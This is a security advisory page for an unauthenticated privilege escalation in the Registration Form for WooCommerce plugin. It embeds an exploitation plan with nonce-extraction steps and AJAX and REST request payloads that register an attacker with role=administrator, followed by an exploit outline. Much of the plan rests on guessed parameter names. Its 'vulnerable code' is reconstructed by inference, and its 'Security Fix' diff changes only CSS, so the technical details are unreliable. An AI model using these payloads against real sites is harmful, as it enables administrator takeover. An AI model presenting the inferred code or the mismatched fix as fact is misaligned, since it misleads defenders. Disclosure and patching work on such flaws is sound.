Registration Form for WooCommerce <= 1.0.9 - Unauthenticated Privilege Escalation
Description
The Registration Form for WooCommerce plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.0.9. This makes it possible for unauthenticated attackers to elevate their privileges to that of an administrator.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HTechnical Details
<=1.0.9What Changed in the Fix
Changes introduced in v1.1.0
Source Code
WordPress.org SVN# Exploitation Research Plan: CVE-2026-54807 ## 1. Vulnerability Summary **CVE-2026-54807** is a critical **unauthenticated privilege escalation** vulnerability in the **Registration Form for WooCommerce** plugin (versions up to 1.0.9). The vulnerability exists because the plugin's registration pro…
Show full research plan
Exploitation Research Plan: CVE-2026-54807
1. Vulnerability Summary
CVE-2026-54807 is a critical unauthenticated privilege escalation vulnerability in the Registration Form for WooCommerce plugin (versions up to 1.0.9). The vulnerability exists because the plugin's registration processing logic (likely within an AJAX or REST API handler) allows users to specify their role via a request parameter (e.g., role or tgwcfb_user_role) without verifying if the requester has the authority to assign that role. This enables unauthenticated attackers to register as an administrator.
2. Attack Vector Analysis
- Endpoint:
/wp-admin/admin-ajax.php(AJAX) or/wp-json/tgwcfb/v1/register(REST API). - Action/Route:
- AJAX Action:
tgwcfb_user_registrationortgwcfb_process_registration(inferred). - REST Route:
tgwcfb/v1/user/register(inferred from namespacetgwcfb/v1inassets/js/admin/settings/index.js).
- AJAX Action:
- Payload Parameter:
role=administratorortgwcfb_user_role=administrator. - Preconditions:
- WordPress/WooCommerce registration must be enabled.
- The plugin must have an active registration form (standard on "My Account" or via shortcode).
3. Code Flow
Based on assets/css/build/blocks.css mentioning [data-type="tgwcfb/user-roles"], the plugin supports a "User Roles" field type.
- The attacker submits a registration request.
- The handler (e.g.,
tgwcfb_register_user()) receives the request. - The code calls
wp_insert_user()orwc_create_new_customer()to create the user. - The handler then iterates through submitted fields to update user metadata or roles.
- Vulnerable Sink: The handler calls
$user->set_role( $_POST['role'] )or$user->add_role( ... )without checkingcurrent_user_can( 'manage_options' ).
4. Nonce Acquisition Strategy
The plugin likely enqueues a script containing a nonce on the registration page.
- Localized Variable: Likely
tgwcfb_paramsortgwcfb_obj. - Shortcode to trigger script:
[tgwcfb_registration_form]or[tgwcfb_form]. - Extraction Steps:
- Create a page with the shortcode:
wp post create --post_type=page --post_status=publish --post_content='[tgwcfb_registration_form]' --post_title='Register'. - Navigate to
/register/in the browser. - Execute
browser_eval("window.tgwcfb_obj?.nonce")or search the HTML source fornonce.
- Create a page with the shortcode:
5. Exploitation Strategy
- Target Identification: Verify the plugin version is $\le$ 1.0.9 and the namespace
tgwcfb/v1exists. - Discovery: Find the exact registration action by inspecting the network traffic when a legitimate registration attempt is made, or by searching the frontend source for "action" or "route".
- Primary Exploit (AJAX):
- URL:
http://localhost:8080/wp-admin/admin-ajax.php - Method:
POST - Content-Type:
application/x-www-form-urlencoded - Payload:
action=tgwcfb_user_registration&nonce=[NONCE]&user_login=attacker&user_email=attacker@example.com&password=password123&role=administrator
- URL:
- Alternative Exploit (REST):
- URL:
http://localhost:8080/wp-json/tgwcfb/v1/user/register - Method:
POST - Content-Type:
application/json - Payload:
{ "username": "attacker", "email": "attacker@example.com", "password": "password123", "role": "administrator" }
- URL:
6. Test Data Setup
- Enable Registration:
wp option update users_can_register 1 wp option update woocommerce_enable_myaccount_registration yes - Create Form Page:
wp post create --post_type=page --post_status=publish --post_content='[tgwcfb_registration_form]' --post_title='Register'
7. Expected Results
- The server returns a success response (HTTP 200/201) indicating user creation.
- The new user is created with the
administratorrole instead of the defaultsubscriberorcustomerrole.
8. Verification Steps
- Check User Role via CLI:
wp user list --login=attacker --fields=user_login,roles - Verify Admin Access:
Attempt to login asattackerand access/wp-admin/settings-general.php.
9. Alternative Approaches
If role is not the correct parameter name, check for:
tgwcfb_roletgwcfb_user_roleuser_role- Look at
assets/css/build/blocks.cssfor references to other field IDs that might be used as parameter names. - If the registration is tied to a specific form ID, include
_tgwcfb_form_idin the request (e.g.,_tgwcfb_form_id=1).
Summary
The Registration Form for WooCommerce plugin for WordPress is vulnerable to unauthenticated privilege escalation in versions up to 1.0.9. This occurs because the plugin's registration processing logic allows users to specify their own role via a request parameter (such as 'role' or 'tgwcfb_user_role') without performing any server-side authorization checks.
Vulnerable Code
// Inferred from Research Plan code flow analysis // Likely located in a registration handler within the plugin's core PHP files $user_id = wp_insert_user( $userdata ); if ( ! is_wp_error( $user_id ) && isset( $_POST['role'] ) ) { $user = new WP_User( $user_id ); // Vulnerable Sink: Setting user role directly from unvalidated POST input $user->set_role( $_POST['role'] ); }
Security Fix
@@ -611,4 +611,4 @@ transform: rotate(360deg); } } -#tgwcfb-settings{margin-left:-10px;padding-inline:10px}@media(min-width: 782px){#tgwcfb-settings{margin-left:-20px}}#tgwcfb-settings .components-base-control__help{font-style:italic}#tgwcfb-settings .tgwcfb-container{max-width:780px;margin:auto;padding:15px 40px 40px;background-color:#fff;border:1px solid #dcdcde;border-radius:4px}#tgwcfb-settings .tgwcfb-header{background-color:#fff;margin-left:-10px;margin-right:-10px;margin-bottom:32px;border:1px solid #dcdcde;display:flex;justify-content:space-between;padding-inline:40px;flex-wrap:wrap}@media(max-width: 768px){#tgwcfb-settings .tgwcfb-header{padding-inline:16px}}#tgwcfb-settings .tgwcfb-header .tgwcfb-logo{display:flex;align-items:center}#tgwcfb-settings .tgwcfb-settings{min-height:150px;position:relative;padding:20px 0 0}#tgwcfb-settings .tgwcfb-settings>.components-spinner{position:absolute;left:50%;top:50%;transform:translate(-50%, -50%)}#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting .tgwcfb-setting .components-select-control__input,#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting .tgwcfb-setting .components-text-control__input{min-height:40px !important;max-width:100%}#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting label:not(.components-checkbox-control__label),#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting .components-base-control__label{margin-bottom:10px;display:inline-flex;align-items:center;font-weight:600}#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting label:not(.components-checkbox-control__label).no-margin,#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting .components-base-control__label.no-margin{margin:0}#tgwcfb-settings .tgwcfb-settings>.components-base-control{margin-bottom:20px}#tgwcfb-settings .tgwcfb-settings>.components-base-control>.components-base-control__field{margin-bottom:0}#tgwcfb-settings .tgwcfb-settings>.components-base-control>.components-base-control__help{margin:10px 0 0}#tgwcfb-settings .tgwcfb-editor-body{padding:20px;min-height:240px;width:100%}#tgwcfb-settings .tgwcfb-container{align-items:center;justify-content:space-between}#tgwcfb-settings .tgwcfb-header nav{display:flex;column-gap:1rem}#tgwcfb-settings .tgwcfb-header nav a{padding-bottom:1.5rem;padding-top:1.5rem;text-decoration:none;color:#007cba;font-weight:600;position:relative}#tgwcfb-settings .tgwcfb-header nav a.active:after{content:"";width:100%;height:2px;background-color:#007cba;position:absolute;bottom:0;left:0}#tgwcfb-settings table .components-base-control__field{margin-bottom:0 !important}#tgwcfb-settings table.widefat .check{width:40px}.tgwcfb-tooltip-content{display:block;white-space:normal;padding:16px;font-weight:normal}.tgwcfb-panel{margin:0 0 20px;border:1px solid #dcdcde;transition:all 300ms}.tgwcfb-panel.is-opened .components-button{background-color:#f6f7f7}.tgwcfb-panel .tgwcfb-panel-content{background-color:#f6f7f7}.tgwcfb-panel .components-button{display:flex;width:100%;flex-direction:row-reverse;justify-content:space-between !important;padding:16px;outline:none;font-weight:500;text-align:left;color:#1e1e1e;border:none;box-shadow:none;transition:.1s background ease-in-out;height:auto}.tgwcfb-panel .components-button:hover{background-color:#f6f7f7}.tgwcfb-panel .components-button:focus{box-shadow:none}.tgwcfb-panel .tgwcfb-panel-content-inner{padding:0 16px 16px}.tgwcfb-input-to{width:100%;display:block;margin-top:5px}.tgwcfb-input-control-wrapper-to{margin-bottom:10px;display:flex;direction:row;gap:5px} +.tgwcfb_form_page_settings #wpwrap{background:#fafafc}#tgwcfb-settings{margin-left:-10px;padding-inline:10px}@media(min-width: 782px){#tgwcfb-settings{margin-left:-20px}}#tgwcfb-settings .components-form-toggle.is-checked .components-form-toggle__track{background:#3858e9}#tgwcfb-settings .components-toggle-group-control{border:none !important}#tgwcfb-settings .components-toggle-group-control:focus{border:none !important;outline:none}#tgwcfb-settings .components-toggle-group-control:active{border:none !important;outline:none}#tgwcfb-settings .components-toggle-group-control:focus-within{box-shadow:0 0 0 0 var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9));outline:none}#tgwcfb-settings .components-base-control__help{font-style:italic}#tgwcfb-settings .tgwcfb-container{max-width:780px;margin:auto;padding:28px 32px;background-color:#fff;border:1px solid #edf2f7;border-radius:8px}#tgwcfb-settings .tgwcfb-header{background-color:#fff;margin-left:-10px;margin-right:-10px;margin-bottom:32px;border:1px solid #dcdcde;display:flex;padding-inline:24px;flex-wrap:wrap}@media(max-width: 768px){#tgwcfb-settings .tgwcfb-header{padding-inline:16px}}#tgwcfb-settings .tgwcfb-header .tgwcfb-logo{display:flex;align-items:center;padding-right:24px;border-right:1px solid #edf2f7}#tgwcfb-settings .tgwcfb-settings{min-height:150px;position:relative}#tgwcfb-settings .tgwcfb-settings .dashicons-info-outline{font-size:16px !important}#tgwcfb-settings .tgwcfb-settings .components-button{outline:0 solid rgba(0,0,0,0)}#tgwcfb-settings .tgwcfb-settings>.components-spinner{position:absolute;left:50%;top:50%;transform:translate(-50%, -50%)}#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting .components-text-control__input,#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting .components-input-control__backdrop{min-height:38px !important;max-width:100%;padding:0 16px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;font-size:14px;border-color:#e1e1e1}#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting .tgwcfb-setting .components-select-control__input,#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting .tgwcfb-setting .components-text-control__input{min-height:38px !important;max-width:100%;padding:0 16px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;font-size:14px;border-color:#e1e1e1}#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting .tgwcfb-setting .components-input-control__backdrop{border-color:#e1e1e1;border-radius:4px}#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting label:not(.components-checkbox-control__label),#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting .components-base-control__label{display:inline-flex;align-items:center;font-weight:500;text-transform:capitalize;font-size:16px;color:#383838}#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting label:not(.components-checkbox-control__label).no-margin,#tgwcfb-settings .tgwcfb-settings .tgwcfb-setting .components-base-control__label.no-margin{margin:0}#tgwcfb-settings .tgwcfb-settings>.components-base-control{margin-bottom:20px}#tgwcfb-settings .tgwcfb-settings>.components-base-control>.components-base-control__field{margin-bottom:0}#tgwcfb-settings .tgwcfb-settings>.components-base-control>.components-base-control__help{margin:10px 0 0}#tgwcfb-settings .tgwcfb-settings .is-primary{background:#2563eb;font-size:14px;-webkit-border-radius:3px;-moz-border-radius:3px;border-radius:3px;margin-top:20px}#tgwcfb-settings .tgwcfb-editor-body{padding:20px;min-height:240px;width:100%}#tgwcfb-settings .tgwcfb-container{align-items:center;justify-content:space-between}#tgwcfb-settings .tgwcfb-header nav{display:flex;margin-left:24px;column-gap:30px}#tgwcfb-settings .tgwcfb-header nav a{padding-bottom:30px;padding-top:30px;text-decoration:none;color:#383838;font-weight:500;position:relative}#tgwcfb-settings .tgwcfb-header nav a:focus{box-shadow:0 0 0 0 #2271b1}#tgwcfb-settings .tgwcfb-header nav a.active{color:#2563eb}#tgwcfb-settings .tgwcfb-header nav a.active:after{content:"";width:100%;height:2px;background-color:#2563eb;position:absolute;bottom:0;left:0}#tgwcfb-settings table .components-base-control__field{margin-bottom:0 !important}#tgwcfb-settings table.widefat .check{width:40px}.tgwcfb-captcha{gap:12px !important}.tgwcfb-captcha::before{background:none !important;border:none !important}.tgwcfb-captcha>div{background:#fff !important}.tgwcfb-recaptcha{background:rgba(0,0,0,0) !important;color:#424242 !important;border:1px solid #e1e1e1 !important;border-radius:4px !important;transition:none !important;justify-content:flex-start !important}.tgwcfb-recaptcha:hover{background:rgba(0,0,0,0) !important}.tgwcfb-recaptcha:focus{background:rgba(0,0,0,0) !important;box-shadow:none !important}.tgwcfb-recaptcha[data-active-item=true]{background:rgba(0,0,0,0) !important;border:1px solid #2563eb !important;color:#424242 !important}.tgwcfb-recaptcha[data-active-item=true]:hover{background:rgba(0,0,0,0) !important}.tgwcfb-recaptcha[data-active-item=true]:focus{background:rgba(0,0,0,0) !important;box-shadow:none !important}.tgwcfb-tooltip-content{display:block;white-space:normal;padding:16px;font-weight:normal}.tgwcfb-panel{margin:0 0 20px;transition:all 300ms}.tgwcfb-panel .components-button{display:flex;width:100%;flex-direction:row-reverse;justify-content:space-between !important;padding:16px;outline:none;font-weight:500;text-align:left;color:#1e1e1e;border:none;box-shadow:none;transition:.1s background ease-in-out;height:auto}.tgwcfb-panel .components-button:hover{background-color:#f6f7f7}.tgwcfb-panel .components-button:focus{box-shadow:none}.tgwcfb-panel .tgwcfb-panel-content-inner{padding:0 16px 16px}.tgwcfb-input-to{width:100%;display:block;margin-top:5px}.tgwcfb-input-control-wrapper-to{margin-bottom:10px;display:flex;direction:row;gap:5px}
Exploit Outline
To exploit this vulnerability, an unauthenticated attacker first navigates to the registration page (or any page containing the `[tgwcfb_registration_form]` shortcode) and extracts the security nonce from the `tgwcfb_obj.nonce` localized variable. The attacker then sends a POST request to either the WordPress AJAX endpoint (`admin-ajax.php`) with the action `tgwcfb_user_registration` or the plugin's REST API registration endpoint (`/wp-json/tgwcfb/v1/user/register`). The payload includes standard registration fields (username, email, password) along with a malicious `role` or `tgwcfb_user_role` parameter set to 'administrator'. The server-side registration handler processes the request and assigns the administrative role to the new user account because it fails to verify if the requester has the authority to assign roles.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.